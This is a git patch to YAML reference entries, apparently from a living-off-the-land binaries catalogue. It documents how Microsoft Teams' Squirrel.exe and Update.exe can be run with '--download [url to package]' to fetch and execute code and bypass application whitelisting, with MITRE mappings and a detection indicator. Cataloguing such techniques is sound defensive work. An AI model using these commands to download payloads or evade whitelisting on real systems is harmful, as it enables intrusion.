From 60f55ee5977d4192f01ec9823b2d4ce522e7b45d Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 27 Jun 2019 17:12:23 +0200 Subject: [PATCH] Adjusted Squirrel and Update --- yml/OtherMSBinaries/squirrel.yml | 46 +++++++++++++++----------------- yml/OtherMSBinaries/update.yml | 8 +++--- 2 files changed, 26 insertions(+), 28 deletions(-) diff --git a/yml/OtherMSBinaries/squirrel.yml b/yml/OtherMSBinaries/squirrel.yml index a653f3a..65db7b1 100644 --- a/yml/OtherMSBinaries/squirrel.yml +++ b/yml/OtherMSBinaries/squirrel.yml @@ -1,47 +1,45 @@ -Name: squirrel.exe -Description: Binary to update the existing installed Nuget/squirrel package -Author: User -Created: Installed date +Name: Squirrel.exe +Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. +Author: 'Reegun J (OCBC Bank) - @reegun21' +Created: '2019-06-26' Commands: - Command: squirrel.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download and execute binary Category: Execute - Privileges: User Privilege + Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ - OperatingSystem: Windows OS + OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: squirrel.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download and execute binary Category: AWL Bypass - Privileges: User Privilege + Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 10 - Command: squirrel.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download and execute binary Category: Download - Privileges: User Privilege + Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ - OperatingSystem: Windows 10 + OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: -- Path: NA -- Path: %localappdata%\Microsoft\Teams\current\Squirrel.exe + - Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe' Code_Sample: -- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel + - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel Detection: -- IOC: NA -- IOC: NA + - IOC: Update.exe spawned an unknown process Resources: - - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls - - Link: https://twitter.com/reegun21/status/1144182772623269889 - - Link: NA - Acknowledgement: + - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls + - Link: https://twitter.com/reegun21/status/1144182772623269889 + - Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ +Acknowledgement: - Person: Reegun J (OCBC Bank) - Handle: @reegun21 - - Person: NA - Handle: NA + Handle: '@reegun21' + - Person: Adam + Handle: '@Hexacorn' --- diff --git a/yml/OtherMSBinaries/update.yml b/yml/OtherMSBinaries/update.yml index e9a45de..92c210e 100644 --- a/yml/OtherMSBinaries/update.yml +++ b/yml/OtherMSBinaries/update.yml @@ -1,11 +1,11 @@ --- Name: Update.exe -Description: Binary to update the existing installed Nuget/squirrel package +Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. Author: 'Oddvar Moe' Created: '2019-06-26' Commands: - Command: Update.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download and execute binary Category: Execute Privileges: User @@ -13,7 +13,7 @@ Commands: MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: Update.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User @@ -21,7 +21,7 @@ Commands: MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: Update.exe --download [url to package] - Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download and execute binary Category: Download Privileges: User